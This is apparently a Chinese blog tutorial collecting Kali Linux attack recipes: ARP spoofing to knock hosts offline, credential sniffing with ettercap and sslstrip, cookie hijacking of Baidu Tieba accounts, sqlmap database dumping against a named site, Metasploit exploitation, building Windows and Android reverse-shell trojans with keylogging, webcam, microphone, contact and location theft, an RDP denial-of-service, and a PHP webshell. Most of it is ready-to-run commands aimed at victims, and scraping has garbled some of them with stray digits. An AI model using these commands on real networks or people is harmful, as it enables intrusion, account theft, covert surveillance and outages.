本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢!

1、局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机)

(1)Windows下查询本机IP地址、默认网关:Cmd下ipconfig

(2)查找局域网中的IP地址:

fping -asg 10.22.116.0/241

(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

模拟ip地址为10.22.116.184的PC是受害者:arpspoof -i eth0 -t 10.22.116.184 10.22.116.2541

此时该PC将无法正常上网----攻击目的达到。

注:ARP断网相当于ARP欺骗的错误配置(不完全配置)造成的现象。

2、局域网下ARP欺骗(目标的IP流量经过我的网卡,进行转发,从网关出去)

(1)开启IP转发流量:

echo 1 > /proc/sys/net/ipv4/ip_forward1

(2)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

(3)获取本机网卡的图片drifnet -i eth0(利用该条命令配合上述的ARP欺骗,可以看到流经本机网卡的受害人的图片流量)

注:(1)echo命令不会有回显;(2)静态网关的情况下ARP欺骗将不会成功。

3、局域网HTTP账号密码获取(使用工具:ettercap—欺骗、DNS欺骗、流量嗅探)

(1)开启IP流量转发:echo 1 > /proc/sys/net/ipv4/ip_forward

(2)查看内容:cat /proc/sys/net/ipv4/ip_forward(观察上述命令是否成功)

(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

模拟本机是受害者:arpspoof -i eth0 -t 10.22.116.184 10.22.116.2541

(4)ettercap -Tq -i eth0

T 代表启动文本模式 q 代表启动安全模式

注:截取到的信息之后如果用户名为中文时显示出来的不是真正的用户名,此时复制用户名字段,上百度搜索URL解码也可以解码出原始用户名

4、局域网下HTTPS账号密码获取(使用工具sslstrip)—本质是先将HTTPS转化为HTTP,然后根据第三条操作

(1)开启SSH连接:

/etc/init.d/ssh start //连接到Xshell1

(2)vim /etc/ettercap/etter.conf(打开该文件)

去除文本if you use iptables之后的#号(两个#号)

(3)sslstrip -a -f -k

sslstrip:把HTTPS的链接还原为HTTP

(4)开启IP流量转发:echo 1 > /proc/sys/net/ipv4/ip_forward1

(5)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

(6)ettercap -Tq -i eth0

T 代表启动文本模式 q 代表启动安全模式

该攻击容易使受害人PC出现证书错误网页这一幕

注:单独命令前加!(感叹号)可以看到最近运行的含有该单词的命令。

5、局域网下登录别人的百度贴吧

方法一:

(1)进行ARP欺骗

(2)启动wireshark 抓包工具

此时受害人登录贴吧,抓包工具会抓取一些数据,然后我们保存文件为.pcap文件

(3)ferret 重新生成抓包后的文件

ferret -r cookies.pcap1

然后对新生成的文件执行:cp 该文件名 /root/

(4)hamster (重放流量)

发现需要本地开代理(如下图)

然后在浏览器输入127.0.0.1:1234,访问该网站

找到www.atcpu.com的网址,点击

注:访问浏览器获取不到信息时,检查是否执行了cd到桌面复制 ferret生成的文件到root/:cp hamster.txt /root/

方法二:

(1)进行ARP欺骗

(2)使用ferretferret -i eth01

(3)浏览器提前设置端口,然后hamster,接着访问127.0.0.1:1234

然后跟方法一最后的步骤相同,登录到受害人的百度贴吧!

6、SQLMAP、ASP网站渗透

(1)形成注入漏洞、获取数据库库名

Sqlmap -u “网址” //-u 检测是否存在注入 、 返回数据库的名字1

需要启动线程(最大线程10)

(2)获取表名Sqlmap -u “网址” --tables//猜解所有表名1

(3)通过猜解的表名,获取列名

Sqlmap -u “网址” --columns -T “表名” //获取列名1

(4)猜解数据Sqlmap -u “网址” --dump -C “列名,列名” -T “表名” //多列猜解 --dump是下载数据,显示的意思 C “列名,列名” 是需要猜解的数据对应的列名1

(5)最后猜解出数据

注:asp网站大多使用access 微软文件数据库、MYSQL使用较多

7、SQLMAP、渗透PHP网站

(1)

Sqlmap -u “网址” //检测是否存在注入1

(2)Sqlmap -u “网址” --is-dba//检测是否存在dba权限,若存在dba权限,则可以写目录,将文件写在文件夹下面1

(3)

Sqlmap -u “网址” --dbs //列出所有的数据库 Sqlmap -u “网址” --current-db //查询自己的数据库1

2

3

(4)Sqlmap -u “网址” --tables -D “数据库名”//根据自己数据库名查询所有的表1

(5)

Sqlmap -u “网址” --columns -T “列名” -D “数据库名” //查询所有的列名1

(6)Sqlmap -u “网址” --dump -C “列名,列名” -T “表名” -D “数据库名” //多列猜解 --dump是下载数据,显示的意思 C “列名,列名” 是需要猜解的数据对应的列名1

(7)

若密码passwd存在解码问题,则登录www.cmd5.com解码!

注:PHP网站使用MYSQL较多

8、SQLMAP–Cookie注入

当使用之前7、8中的常规方法检测是否存在注入不行的时候,尝试Cookie中转注入

(1)例:对于某网站http://www.hajkfkahf.com.cn/about.asp?id=56

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --cookie “id=56” --level 2 //如果是cookie注入就要把等级提升为level 21

然后就可以开始注入

(2)sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --tables --cookie “id=56” --level 2//猜解所有表名1

(3)

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --columns-T “表名” --cookie “id=56” --level 2 //猜解所有列名1

(4)sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --dump -C “username,password” -T “表名” --cookie “id=56” --level 2//假如存在username、password列1

9、Metasploit–远程控制软件生成、系统操作

进入kali虚拟机输入msfconsole,启动命令行模式

exploits模块:漏洞利用模块

payloads模块:shellcode 漏洞执行后的代码

use exploit/windows/smb/ms08_067 _netapi //选择漏洞模块(按下TAB可以进行)show options //查看要填入的参数(此时需要填入一个IP地址)set RHOST IP地址set PAYLOAD windows/meterpreter/reverse_tcp //选择tcp的反向链接1

2

3

4

当所有的设置填充完毕之后,输入exploit进行攻击

在此,介绍怎么去生成一个小木马~

木马:控制端 (控制远程) 服务端(木马程序)

(1)进入kali启动msf:msfconsole

(2)自己IP地址为:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 X > test.exe//根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)1

然后就会生成一个名为test.exe的木马程序

(3)

use exploit/multi/handler //使用handler这个模块set PAYLOAD windows/meterpreter/reverse_tcp //使用shellcode1

2

然后填写生成木马的IP、PORT(跟上面生成木马时相同)

(4)然后输入exploit执行msf等待木马生效,生效后即可通过命令行进行操作!

(5)输入background执行msf —将已连接的会话放在后台

sessions -l —查看已经连接的会话

sessions -i 1 —连接到之前仅有的一个会话

(6)注入进程:因为木马很可能随时被结束—持久访问ps---得到要注入的PID进程;找到explorer.exe,得到该进程的进程号Migrate PID ---注入进程run vnc---获取受害者电脑桌面1

2

3

(7)文件管理功能

download+文件名 下载文件edit+文件名 编辑文件cat+文件名 查看文件mv+文件名 移动文件rm+文件名 删除文件upload+文件名 上传文件mkdir+文件夹名 创建文件rmdir+文件夹名 删除文件夹shell 直接切到对应位置1

2

3

4

5

6

7

8

9

(8)网络与系统操作

网络arp看arp缓冲表getproxy获取代理ifconfig看IP地址及网卡netstat查看端口链接1

2

3

4

系统

kill 结束进程ps 查看进程reboot 重启电脑reg 修改注册表shell 获取shellshutdown 关机sysinfo 获取电脑信息1

2

3

4

5

6

7

(9)enumdesk tops用户登录数keyscan-dump键盘记录--下载keyscan_start键盘记录--开始keyscan_stop键盘记录--停止uictl获取键盘鼠标控制权//uictl disable/enable keyboard/mouserecord_mic音频录制//record_mic -d 10 表示录制10秒;提前安装mplayer:apt-get install mplayer;录制完成后mplayer+录制文件webcam_chat查看摄像头接口webcam_list查看摄像头列表webcam_stream摄像头视频获取getsystem获取高权限hashdump下载HASH密文1

2

3

4

5

6

7

8

9

10

11

注:不用连接数据库;如果代码出错,可以先删掉metasploits:apt -get remove metasploits,然后再重新安装一遍:apt -get install metasploits;RHOST目标IP,LHOST本地IP;操作过程中可以help查看命令

10、Metasploit–渗透安卓实战

(1)生成木马

use exploit/multi/handler //做一个反弹会话链接,使用handler这个模块set PAYLOAD android/meterpreter/reverse_tcp //使用shellcodeshow options //查看要填入的参数(此时需要填入一个IP地址)set RHOST IP地址set PAYLOAD android/meterpreter/reverse_tcp //选择tcp的反向链接msfpayload android/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 R > test.apk //根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)exploit //等待木马生效1

2

3

4

5

6

7

(2)会话连接好之后search 搜索jpg png bmpdownload下载jpg png bmpwebcam-snap手机截屏webcam_stream开启摄像头webcam_list webcam_stream -i 2前后摄像头互换 参数-icheck_root 检查ROOTdump-calllog下载电话记录;可能出现编码问题,换编码---leafpaddump_contacts下载信息记录geolocate GPS定位1

2

3

4

5

6

7

8

9

11、Metasploit–服务器蓝屏攻击(此攻击参考教程)

(1)确定攻击目标 MS12-020

执行msf,search ms12-020

(2)

use auxiliary/scanner/rdp/ms12-020-check //利用该漏洞show options //查看并填入参数set RHOST 受害服务器IP地址exploit //确定该服务器存在漏洞use auxiliary/dos/windows/rdp/ms12-020-maxchannelidsset RHOST 受害服务器IP地址exploit //攻击服务器,此时达到服务器蓝屏攻击的目的;此时重启受攻击的服务器重启就可恢复execute -f notepad //远程打开记事本1

2

3

4

5

6

7

8

12、Metasploit–生成webshell及应用

(1)在msf中生成一个PHP脚本msfpayload php/meterpreter/reverse_tcp LHOST=kali本机IP地址 R > web.php//生成一个PHP脚本,当做webshellcat web.php //查看脚本内容---通过修改其中的IP地址、端口号可以实现攻击其他pc的目的1

2

(2)上传该脚本(ftp……)

use exploit/multi/handler //做一个反弹会话链接,使用handler这个模块1

然后做set LHOST、LPORT……

然后exploit等待脚本触发(运行PHP文件即可触发)

(3)

通过之前所学,使用可用命令达到期望的目标

…………

作者:苏小酱

kali使用mysql注入攻击_基于kali实现的一些攻击相关推荐

  1. 最小攻击超过最大攻击_贪婪洞窟攻击力解析 最大攻击与最小攻击对比分析

    <贪婪洞窟>中武器有"攻击速度"属性,代表武器装备上以后角色的攻击频率.按照攻击频率的高低,武器攻速共分快速.中速和慢速三种.<贪婪洞窟>中的攻速属性是一个 ...

  2. wifi 中间人攻击_公共wifi下的中间人攻击

    现在许多地方都提供免费公共WiFi.作为使用服务的额外好处,机场,酒店和咖啡馆都在提供免费的网络连接.对于许多人来说,能够在旅途中连接到免费的互联网似乎是理想的选择.能够访问他们的工作电子邮件或在线共 ...

  3. java 流量攻击_如何防御网站被ddos攻击 首先要了解什么是流量攻击

    什么是DDOS流量攻击?我们大多数人第一眼看到这个DDOS就觉得是英文的,有点难度,毕竟是国外的,其实简单通俗来讲,DDOS攻击是利用带宽的流量来攻击服务器以及网站. 举个例子,服务器目前带宽是100 ...

  4. php mysql生日提醒_基于AIML的PHP聊天机器人

    php中文网最新课程 每日17点准时技术干货分享 chatbot:基于AIML的PHP聊天天机器人 本文章中讲介绍用PHP实现的一个小聊天机器人程序,用到了php操作dom相关的知识和mysql数据库 ...

  5. php ajax mysql 分页查询_基于PHP_MySql_Ajax的分页技术方案

    一.引言 Ajax的全称是AsynchronousJavaScriptAndXML(异步JavaScript和XML),它不是一项新技术,而是很多成熟的技术的集合. 和Applet,Flash相比,A ...

  6. mysql for循环_基于Swoole扩展开发异步高性能的MySQL代理服务器

    MySQL数据库对每个客户端连接都会分配一个线程,所以连接非常宝贵.开发一个异步的MySQL代理服务器,PHP应用服务器可以长连接到这台Server,既减轻MYSQL的连接压力,又使PHP保持长连接减 ...

  7. mysql异步扩展_基于Swoole扩展开发异步高性能的MySQL代理服务器

    MySQL数据库对每个客户端连接都会分配一个线程,所以连接非常宝贵.开发一个异步的MySQL代理服务器,PHP应用服务器可以长连接到这台Server,既减轻MYSQL的连接压力,又使PHP保持长连接减 ...

  8. java arp 攻击_基于Jpcap的Java ARP断网攻击

    这是大二学习计算机网络的时候写的一个小程序,可实现局域网内断网攻击.这也作为学习网络层.数据链路层(在OSI模型中ARP协议属于链路层:而在TCP/IP模型中,ARP协议属于网络层)的其中一个小实验吧 ...

  9. mysql连接池_基于Swoole的通用连接池 - 数据库连接池(life)

    open-smf/connection-pool 是一个基于Swoole的通用连接池,常被用作数据库连接池. 依赖 依赖版本PHP>=7.0.0Swoole>=4.2.9Recommend ...

最新文章

  1. 一个NullPointerException,竟然有这么多花样!
  2. 如何在科研论文中画出漂亮的插图?(附代码)
  3. 对ViewPager的理解
  4. 调整搜索二叉树中两个错误的节点
  5. 天翼云从业认证(4.12) 天翼云医疗行业解决方案
  6. Codeforces Round #368 (Div. 2) problem: (C) Pythagorean Triples
  7. MATLAB随机模拟
  8. linux软链接上传svn,svn 软链接问题
  9. sql 日周月统计和
  10. java 解析json的问题
  11. Gravatar - globally recognized avatar
  12. [TYVJ3097/3121/3369] 战略游戏
  13. java多线程问题(代码示例)
  14. as3.0点击获取TLF文本的实例名
  15. 【Kotlin学习之旅】Kotlin实现101个C#的LINQ示例,让你领略一下Kotlin代码的魅力
  16. 不同tab页sessionStorage共享情况
  17. 视频处理基础知识整理
  18. 【毕业设计】深度学习动物识别系统 - python 卷积神经网络 机器视觉
  19. 关于中文乱码问题的一些解决方案和经验
  20. ASA防火墙之NAT的实例配置

热门文章

  1. java 时间取整_java 小时时间就近取整
  2. 微信小程序自定义弹框+生成二维码功能
  3. 打赢互花米草除治攻坚战——浙江镇海海岸带生态修复实践
  4. Ubuntu安装Pycharm专业版
  5. linux数组shell操作,shell数组操作简明总结
  6. 理解Java接口回调
  7. html图片加载特效(预加载和加载失败)
  8. 超六成90后有创业意愿;星巴克中国升级星享俱乐部会员制度 | 美通企业日报...
  9. 浪潮互联网“铁娘子”王虹莉现身说法:传统企业互联网+的三个挑战
  10. java 动态行转列_行转列的三种实现方式